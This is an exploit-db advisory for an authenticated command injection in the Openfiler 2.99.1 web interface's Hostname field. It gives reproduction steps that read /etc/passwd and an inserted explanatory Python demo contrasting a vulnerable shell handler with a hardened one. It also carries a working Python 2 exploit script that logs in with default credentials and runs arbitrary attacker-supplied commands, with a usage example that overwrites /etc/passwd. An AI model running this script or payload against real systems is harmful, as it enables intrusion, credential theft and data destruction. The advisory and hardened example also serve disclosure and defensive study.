OpenFiler 2.99.1 – Arbitrary Code Execution

  • Author: Dolev Farhi
    Date: 2014-05-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33247/
  • # Exploit Title: Arbitrary Code Execution in Openfiler
    
    # Exploit author: Dolev Farhi @f1nhack
    
    # Date 07/05/2014
    
    # Vendor homepage: http://www.openfiler.com
    
    # Affected Software version: 2.99.1
    
    # Alerted vendor: 7.5.14
    
    
    Software Description
    =====================
    Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based 
    Storage Area Networking functionality in a single cohesive framework.
    
    
    
    Vulnerability Description
    =========================
    Authenticated OS command injection in the Hostname field (System tab) of the Openfiler web
    management interface. The submitted hostname value is handed to a shell without any
    validation, so backtick command substitution placed in the field is executed on the
    appliance with whatever privileges the web interface runs with, and the output of the
    command is reflected back in the hostname value field. Any user who can log in to the
    dashboard can therefore run arbitrary commands on the storage host.
    
    
    Steps to reproduce / PoC:
    =========================
    1.1. Log in to the Openfiler dashboard.
    
    1.2. Go to the System tab -> Hostname.
    
    1.3. In the hostname field, enter any shell command you desire wrapped in backticks ` `,
    
    	e.g. `cat /etc/passwd`
    	
    1.4. The command is executed and its output is reflected in the hostname value field.
    
    
    
    <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
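    The following is an added example, not Openfiler's code and not part of the original advisory: a hypothetical hostname handler written in the vulnerable shape the advisory describes (form value spliced into a shell command string), placed beside a hardened version that allow-lists the value against RFC 1123 hostname syntax and runs the command without a shell. `echo` stands in for the real hostname-setting command so the demo does not change the machine; the shell still performs the backtick and `$(...)` substitution exactly as in the PoC. The function names and the sample payload are assumptions for illustration.

```python
import re
import subprocess

# RFC 1123 host name: dot-separated labels of 1-63 letters, digits or hyphens,
# no label starting or ending with a hyphen, 253 characters in total at most.
# Every shell metacharacter (` $ ( ) ; | & space ...) falls outside this set.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_hostname(value):
    """Allow-list check: True only for a syntactically valid host name."""
    return bool(HOSTNAME_RE.match(value))


def set_hostname_vulnerable(value):
    """Hypothetical handler in the shape the advisory describes: the form
    value is concatenated into a command line and handed to /bin/sh, so
    backticks in the value are executed as command substitution.
    `echo` stands in for the real hostname command (demo only)."""
    result = subprocess.run("echo " + value, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def set_hostname_safe(value):
    """Hardened handler: reject anything that is not a host name, then pass
    the value as a single argv element with no shell in between, so even a
    value that slipped through validation could not be interpreted."""
    if not is_valid_hostname(value):
        raise ValueError("invalid hostname: %r" % value)
    result = subprocess.run(["echo", value], capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    payload = "nas01`echo pwned`"   # constructed payload, same shape as the PoC
    print(set_hostname_vulnerable(payload))   # sh expands the backticks
    try:
        set_hostname_safe(payload)
    except ValueError as exc:
        print("rejected:", exc)
    print(set_hostname_safe("nas01.example.org"))
```

    Run it on any POSIX host with Python 3.7 or later. The vulnerable function returns the substituted output, which is the behaviour the advisory reports as the command output "reflecting" in the hostname field; the hardened function refuses the same payload before any process is started. Validation alone is not the fix: dropping `shell=True` and passing an argument vector is what removes the shell from the path, and the allow-list is the defence in depth on top of it.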
    
    #!/usr/bin/env python
    # Exploit Title: Openfiler Remote Code Execution 
    # Date 21/12/2014
    # Affected Software version: 2.99.1
    # Alerted vendor: 7.5.14
    
    # Quick and dirty exploit (Python 2: urllib2 / cookielib)
    # usage: python openfiler_RCE.py <Command>
    # Author: Dolev Farhi @dolevff
    
    import sys
    import urllib
    import urllib2
    import cookielib
    
    server = 'ip.add.re.ss'   # Openfiler management interface, HTTPS on port 446
    username = 'openfiler'
    password = 'password'
    timeout = 6
    # Wrap the command in backticks so the hostname handler's shell executes it
    command = '`' + ' '.join(sys.argv[1:]) + '`'
    
    if len(sys.argv[1:]) == 0:
        print 'Missing argument (command)'
        print 'example: python openfilerRCE.py echo > /etc/passwd'
        sys.exit(0)
    
    try:
        # Cookie jar keeps the session cookie returned by the login form
        cj = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        login_data = urllib.urlencode({'username' : username, 'password' : password})
        opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout)
        # Same form the System -> Hostname page submits; 'netconf' is the Update button
        payload = urllib.urlencode({'hostname' : command, 'netconf' : 'Update'})
        url = 'https://%s:446/admin/system.html' % (server)
        resp = opener.open(url)
        # A logout link on the admin page means the login succeeded
        if 'logout.html' in resp.read():
            opener.open('https://' + server + ':446/admin/system.html', payload)
            print ('Executed %s :-)' % (command))
            sys.exit(0)
    except urllib2.URLError, e:
        print 'Error: %s' % (e.reason)
        sys.exit(1)
    except Exception, e:
        print 'Error: possibly invalid credentials, try again.'
        sys.exit(1)